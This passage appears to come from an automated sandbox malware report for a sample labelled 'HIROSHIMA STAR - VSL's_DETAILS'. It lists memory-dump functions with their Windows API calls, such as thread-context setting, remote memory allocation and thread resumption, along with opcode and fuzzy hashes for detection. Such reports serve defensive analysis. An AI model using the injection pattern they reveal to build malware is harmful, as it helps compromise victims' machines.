Opcode ID: f6b54c12ab109e38ff1b60dd8cc179656f8c7b4a1f85076a2ba34027f306d42d
Instruction ID: 389639bb01f63473a5be855a04947039aa3ead171ab9eba344bb4b018951b082
Opcode Fuzzy Hash: f6b54c12ab109e38ff1b60dd8cc179656f8c7b4a1f85076a2ba34027f306d42d
Instruction Fuzzy Hash: D92127B1900359EFCB10CFA9C885BDEBBF5FF48314F108429E958A7250C7789954CBA4

Function 079A9F30 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079A9FB6

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1527b04c8bbcdee36349b590206d56c74620ee7af7b8768404a56d7684c43c8b
Instruction ID: e73ff50d50196bff99c68c327762175016828be39cbaadb6e693c66210170939
Opcode Fuzzy Hash: 1527b04c8bbcdee36349b590206d56c74620ee7af7b8768404a56d7684c43c8b
Instruction Fuzzy Hash: 422137B19003099FDB10DFAAC4857EEBBF4EB88324F14842AD459A7241CB78A945CFA4

Function 027FD070 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027FD76E,?,?,?,?,?), ref: 027FD82F

Memory Dump Source

Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f6e1bfcb9c7eeadd8bcaad394c9d08164297b07079a44e590a0f2cfedb83bd90
Instruction ID: cdca2ef4d575b2d12b8d614946023f652da5de443a4646452878dd60d29619bb
Opcode Fuzzy Hash: f6e1bfcb9c7eeadd8bcaad394c9d08164297b07079a44e590a0f2cfedb83bd90
Instruction Fuzzy Hash: 8021F2B5900208AFDB50CFAAD584AEEBBF4EB48310F10802AE918A7310D374A950CFA0

Function 0774DA0A Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0774DA83

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d0a68c9f82444595b1992e755859cb5e40ad8e6dab93e575cc2dbf8a7cd318f2
Instruction ID: 15f9fa5cfabee217370a47138f29968c7332828e05e4d346c468f1978ff72984
Opcode Fuzzy Hash: d0a68c9f82444595b1992e755859cb5e40ad8e6dab93e575cc2dbf8a7cd318f2
Instruction Fuzzy Hash: 8A2104B69002099FCB10CF9AC584ADEBBF4EB49320F108429E998A7251C374A945CFA5

Function 079AA5C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079AA640

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 820b683d3da7fc8f3a0f3a85c44fffcaf232e8e8a5de22f5de7ebf9b5f267f29
Instruction ID: 34df422f9e7f49bd0781472ca966e115740bfa220410f3d56c7495ddff7932d4
Opcode Fuzzy Hash: 820b683d3da7fc8f3a0f3a85c44fffcaf232e8e8a5de22f5de7ebf9b5f267f29
Instruction Fuzzy Hash: 062125B18003599FCB10DFAAC884AEEFBF5FF48320F10842AE558A7250C7389944CFA4

Function 079A9F38 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079A9FB6

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 809eeb258410cdb2a17d05485b3982a6fd0bdbef0ff60085d42b249c3e379677
Instruction ID: c85c69e77c21e4f058c46df54f3722f11f7564388655a09c40fdf1bb7373a8f9
Opcode Fuzzy Hash: 809eeb258410cdb2a17d05485b3982a6fd0bdbef0ff60085d42b249c3e379677
Instruction Fuzzy Hash: CB2118B19003099FDB10DFAAC4857EEFBF5EF88324F148429D459A7241CB78A945CFA5

Function 027FD7A0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027FD76E,?,?,?,?,?), ref: 027FD82F

Memory Dump Source

Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d1590c37fef0c8dc2b3e303e7c09b69329de086ff7d971d5cd4f6eba835c16a6
Instruction ID: 6002bab975ad6b17fd7cfa4344c00bc0ccd700a7fc5a17a05ab4adb55fbb0625
Opcode Fuzzy Hash: d1590c37fef0c8dc2b3e303e7c09b69329de086ff7d971d5cd4f6eba835c16a6
Instruction Fuzzy Hash: B92100B5900209DFDB10CFA9D584ADEBBF5FB08310F14806AE958A7351C778A940CFA4

Function 079ACFC0 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 079AD025

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a0ed992cda27a713c62916b9022ec618b7816503db3c331261f6d482e65e9338
Instruction ID: b4e39faccff284409f6786edf563bc11951ed7a1e2d597b577c245b6d9c34db2
Opcode Fuzzy Hash: a0ed992cda27a713c62916b9022ec618b7816503db3c331261f6d482e65e9338
Instruction Fuzzy Hash: B72103B6900259EFDB10DF9AD445BDEFBF8EB48324F20881AE558A7600C375A944CFA0

Function 079AA008 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079AA07E

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8bab91cba225e561770ea5670f4bcf3b3d5f362edeb318fae31d32bd835d675e
Instruction ID: 24a933426fc0609bd7892cb3b7b470b784fd90943704204e74b70002003526b9
Opcode Fuzzy Hash: 8bab91cba225e561770ea5670f4bcf3b3d5f362edeb318fae31d32bd835d675e
Instruction Fuzzy Hash: E11156B28003499FCB10DFAAC845BDEBFF5EF88324F108829E559A7250C776A555CFA4

Function 0774DA10 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0774DA83

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 42f610f33f9ce626845c65c5d5b010fa986988986204b79a743b614f2bf4fd2e
Instruction ID: 5d4b1698469fbf1a14a704d60c2b9c9f92eae3028532e826fd8ac61bceed644b
Opcode Fuzzy Hash: 42f610f33f9ce626845c65c5d5b010fa986988986204b79a743b614f2bf4fd2e
Instruction Fuzzy Hash: 8421E4B6900249DFCB10DF9AC984BDEFBF5FB49320F108429E958A7250D778A944CFA5

Function 079AA010 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079AA07E

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: da90de3ac89561ea85a21864a58a4eb54e7f5d7d63df291f83ab5b0a54555062
Instruction ID: 0f9daac7399fdb49dedf8be0bffdd659d7d872578416c1b7bd5eb1f177c79410
Opcode Fuzzy Hash: da90de3ac89561ea85a21864a58a4eb54e7f5d7d63df291f83ab5b0a54555062
Instruction Fuzzy Hash: 0C1126B19002599FCB10DFAAC844BDEBFF5EB88324F108829E559A7250C775A554CFA4

Function 079A9E80 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 079A9EEA

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3c3d7a6849b56d489a82f848e0cccfb8eebc8c01fc87478927ea4d40a6b86cda
Instruction ID: 4ad397f5026f10a9da68610ef34f428854538a93c7e4e369a3bb8af50e95ac42
Opcode Fuzzy Hash: 3c3d7a6849b56d489a82f848e0cccfb8eebc8c01fc87478927ea4d40a6b86cda
Instruction Fuzzy Hash: 8D116AB19003499FCB10DFAAC8457DFFBF9EB88324F248429D459A7240CB35A945CF94

Function 079A9E88 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 079A9EEA

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1f129b0da10217936627162bede5689a4796a95b06c62a88d003f002761dc6ed
Instruction ID: f83c830a52f8924119404400031d18b5373913df9f60ae567fdc8d9a5eb24b17
Opcode Fuzzy Hash: 1f129b0da10217936627162bede5689a4796a95b06c62a88d003f002761dc6ed
Instruction Fuzzy Hash: 8E113AB19003499FDB10DFAAC4457DEFBF9EB88324F248419D459A7250CB75A944CF94

Function 079AA228 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 079AD025

Memory Dump Source

Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f02fe96d9812646d283932ecfe2dce49c55bac8d867eaa74d51a99e0795dc944
Instruction ID: 0296ef055252e2f3facfa6dff21606e8240ef3857adb51133fc0da7df875f1ee
Opcode Fuzzy Hash: f02fe96d9812646d283932ecfe2dce49c55bac8d867eaa74d51a99e0795dc944
Instruction Fuzzy Hash: 7D1122B5900359EFDB10CF9AC448BDEBFF8EB49324F108819E558A7240C375A940CFA0

Function 027FB4E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 027FB546

Memory Dump Source

Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bf7000115070e5029e264c83a8c5bc063978d30f3a7891a605ab14cbb21e4970
Instruction ID: 70c5bebeac9b23d2aeb803063409d5b617e8dc32b217967a5c67fe16ecaf6c2a
Opcode Fuzzy Hash: bf7000115070e5029e264c83a8c5bc063978d30f3a7891a605ab14cbb21e4970
Instruction Fuzzy Hash: 8C110FB6C002598FCB10CF9AC444ADEFBF4AB88328F10842AD558B7210C379A545CFA1

Function 05C3DAF8 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

@, xrefs: 05C3DB2A

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4104f79fc63ec5121a13f8db0861f857bacc44b4438e2a3a6e4327be2edc04c3
Instruction ID: e73f4e2480332a347fd5f040da10b6ba55f748e0fc508d86a92e0a383d195d26
Opcode Fuzzy Hash: 4104f79fc63ec5121a13f8db0861f857bacc44b4438e2a3a6e4327be2edc04c3
Instruction Fuzzy Hash: D491B070E00218CFCF15DFA9D455AAEBBF2FF89314F10846AE81AAB351CB749945CB91

Function 05C3516C Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C36A31

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: d5514fd935a1bbd58b5ea52ac3555d62ea3ae3092ea48778e3371fe09f1f4e37
Instruction ID: f48b5e24327cb945c9c7f411e9866d38b868e0eb97741dff15af7bb9f7e1f9e8
Opcode Fuzzy Hash: d5514fd935a1bbd58b5ea52ac3555d62ea3ae3092ea48778e3371fe09f1f4e37
Instruction Fuzzy Hash: 45519C31B002098FCB15EB79D8899BEBBF7EFC42207258969E459DB351EF309D058791

Function 05C3F370 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

, xrefs: 05C3F47E

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: cd4dfa6f035d033dd4600f0c11a7aadcc9faf8d9773a43806404e794c770f2a5
Instruction ID: e5b997786a900448c4a9e99f3e8305d0ff50c73646cc28593fed9a24ba177bbe
Opcode Fuzzy Hash: cd4dfa6f035d033dd4600f0c11a7aadcc9faf8d9773a43806404e794c770f2a5
Instruction Fuzzy Hash: A6510875A0020ACFDB14DF69D445A9EBBF1FF88351F14C929E819A7250D734E951CF90

Function 05C3DAE8 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

@, xrefs: 05C3DB2A

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 39bd4f7b5dfe0731139bb5f732b106d98022bf988ad49dcfe7e67471d57596be
Instruction ID: d96cab1034d9a93b9716b343ff47ea89eebbe2359f4a845e807f42356e47f9ef
Opcode Fuzzy Hash: 39bd4f7b5dfe0731139bb5f732b106d98022bf988ad49dcfe7e67471d57596be
Instruction Fuzzy Hash: E011AC75B00249DBCF15ABA995985FEBBB2FF84214B00847BD409AB242CB758A45C7A2

Function 05C33388 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

W, xrefs: 05C33394

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 85d6f35c82996d2be7cf192bf3df5cfe02226e22e1b3049c47e3f7fc2b24f530
Instruction ID: 814af4f21dc88a2ffd117ae720025ff6b7a57742c08d933047727fb459e5b3fe
Opcode Fuzzy Hash: 85d6f35c82996d2be7cf192bf3df5cfe02226e22e1b3049c47e3f7fc2b24f530
Instruction Fuzzy Hash: 8721F971E0010A9FCB44DFADC8849EEFBF5FF88300B11865AE518E7210E7749956CB90

Function 05C367F0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C3685B

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 3d58c15214a88b3c2522fbc97c70e1d3f73293bdf462abfc7ea528607d48fc8a
Instruction ID: 1885dcb89c04d117278e3c47264fe0ca5cd3548048c9f5ffd36d9d7124ecb65a
Opcode Fuzzy Hash: 3d58c15214a88b3c2522fbc97c70e1d3f73293bdf462abfc7ea528607d48fc8a
Instruction Fuzzy Hash: B7112E31F0020E9BCF54EBB9D9515EEB7F6AFC8310B14446AC905E7244EB318E56CBA2

Function 05C35D50 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C35D91

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: bbfac168472462ed0630057be9021a7337c5f805a505ae71b919e83c7a479e5a
Instruction ID: 80444de4daf066315ca4ea18757770cf5fa4177ff5eeeac627649ed3c33b19c4
Opcode Fuzzy Hash: bbfac168472462ed0630057be9021a7337c5f805a505ae71b919e83c7a479e5a
Instruction Fuzzy Hash: EE01D4749053899FCB0AEB78E54599CBFB2FF4221071486EDE4459F297DE301A49C742

Function 05C35D60 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C35D91

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 0f3e1b861e8a87d37106a09bc8f207f4fd13bc6c6f71a6048046dccad190cbb8
Instruction ID: ecce9cd891deabd33f4d35c95e269c413b79f6106620adaa44c73d1c45a16630
Opcode Fuzzy Hash: 0f3e1b861e8a87d37106a09bc8f207f4fd13bc6c6f71a6048046dccad190cbb8
Instruction Fuzzy Hash: 66F04F34A10209EFCB48FFB8E55569CBFB2FB44300B1085ADE849A7355EF305A49DB56

Function 05C338D0 Relevance: .8, Instructions: 781COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53712850c71ab650004e96a685d56be8b28be3ab713b4059e81176b666c2f67
Instruction ID: d14b0615a1d79cbbaf9d91ce6eca744951b524bfc06e45b26383895cdb2953df
Opcode Fuzzy Hash: f53712850c71ab650004e96a685d56be8b28be3ab713b4059e81176b666c2f67
Instruction Fuzzy Hash: CE62F470F10B868ADB789FB488CE3AD7A91FB45300F548D3ED0BACB251DB3495459B85

Function 05C3B470 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd322f8ba4d12c8850abb91b298f98f0e758c7b5b6a36f0430974eafc82eff26
Instruction ID: ef15000f15eda4ededa202560e26b66ac763fdfe5bd8ad9403cb7987be770c03
Opcode Fuzzy Hash: cd322f8ba4d12c8850abb91b298f98f0e758c7b5b6a36f0430974eafc82eff26
Instruction Fuzzy Hash: 8B81DF387106148FCB08EB28D599E6A7BF6FF89B04B1545A9E506CB3B5DB71ED01CB80

Function 05C3C6E0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e012fc6f230c30d99d2b7ed504c6b95deb462e143de55e3e4e495458756e2816
Instruction ID: 627f06019744cf8973c09fedf4b2de6c2e6401f7a53fe1906c2aeba0e3fe87cb
Opcode Fuzzy Hash: e012fc6f230c30d99d2b7ed504c6b95deb462e143de55e3e4e495458756e2816
Instruction Fuzzy Hash: 6A818035A10209DFCB04EFA4D8599EDBBB1FF89300F158969E502BB264EB709E55CF90

Function 05C3D850 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dd23a07d15006095535cae1472f9dea6cba4a8e8977c176b6f0f5e38f371e1e
Instruction ID: c166ac45f23769bf8705daf500d6e195bd06713154710acc488583b91515119c
Opcode Fuzzy Hash: 8dd23a07d15006095535cae1472f9dea6cba4a8e8977c176b6f0f5e38f371e1e
Instruction Fuzzy Hash: E9819D35B006089FDB14DFA9D485AAEB7F2FF88350F1588B9D00BAB251DB31AD45CB91

Function 05C32638 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40245f1a1aef184b21aa3b0494cf8d79cc380f84f9866b6e8d210f9aa3eba022
Instruction ID: 7fc0cd6f7ffc8c3e1b6e4be5ffaa1c30b408716d56f7724d3fd90f42be436152
Opcode Fuzzy Hash: 40245f1a1aef184b21aa3b0494cf8d79cc380f84f9866b6e8d210f9aa3eba022
Instruction Fuzzy Hash: 91716D38E00609CFDF04DFB9D8596ADBBB2FF89300F108969E416B7250EB749A45CB90

Function 05C31710 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78737c48a95969d02e638efa209db68bef963a3e05409630526e708e4feb0e6d
Instruction ID: 339d19018582d871066b4388753dccfe6db3cad254da56044d6bc9b2775a3e8d
Opcode Fuzzy Hash: 78737c48a95969d02e638efa209db68bef963a3e05409630526e708e4feb0e6d
Instruction Fuzzy Hash: 6351C131A04208DFCB10DF69C445BAEBBF6FF89300F188529D40AAB361DB75E945CB91

Function 05C32B38 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e4f238a94aa7983ea3b476b7e1428d502bda6ee6a0210732d723f5ac6a4717
Instruction ID: c441c7b92eceb1f9b9ad5b0ea53fc7b931883c37559fa83ef75959fdab0b1b16
Opcode Fuzzy Hash: c3e4f238a94aa7983ea3b476b7e1428d502bda6ee6a0210732d723f5ac6a4717
Instruction Fuzzy Hash: 96717E78A01208EFDB15DF99D489DAEBBB6BF48714B114498F902AB361DB31ED81CF50

Function 05C31720 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da482a63a3e3fbdc4009ddd0f498b48ef18b8c829e02ad1471e2f5cb1f4503a6
Instruction ID: 007f00b011f3aa9f4e42ddd286cfe416f641b2254cfb35036131132f5aa493ee
Opcode Fuzzy Hash: da482a63a3e3fbdc4009ddd0f498b48ef18b8c829e02ad1471e2f5cb1f4503a6
Instruction Fuzzy Hash: FE51AB317042088FCB15EB69C489BAEB7F6BF89304F184869D10ADB3A1DB75ED41CB91

Function 05C31F58 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc27407aa462cf5b32077fa83298f7614513e33e0aad91052da126b35324b28
Instruction ID: e2286e89bd9a810f3aaccb6f4d950690a16288fd693b24ad723bbc84cb799ad1
Opcode Fuzzy Hash: 3dc27407aa462cf5b32077fa83298f7614513e33e0aad91052da126b35324b28
Instruction Fuzzy Hash: F5416A34B142588FDB54DBAAC895EADBBF6BF49704F1440A9E502EB361CB31DD04CB50

Function 05C32D48 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d91087842e9bbb7b1da3fbd5d3c2ae0b9a3fbd8cf33f7df2152972df65716541
Instruction ID: 21017ea8ad39559fd27becfb4eedc759094300e0fa7973af1965f13b7b6e2596
Opcode Fuzzy Hash: d91087842e9bbb7b1da3fbd5d3c2ae0b9a3fbd8cf33f7df2152972df65716541
Instruction Fuzzy Hash: 8E417E35E0021A8FDF00DE69D4856EEB7F1FF88311F14852AE445E7290EB38DA85CBA1

Function 05C32168 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

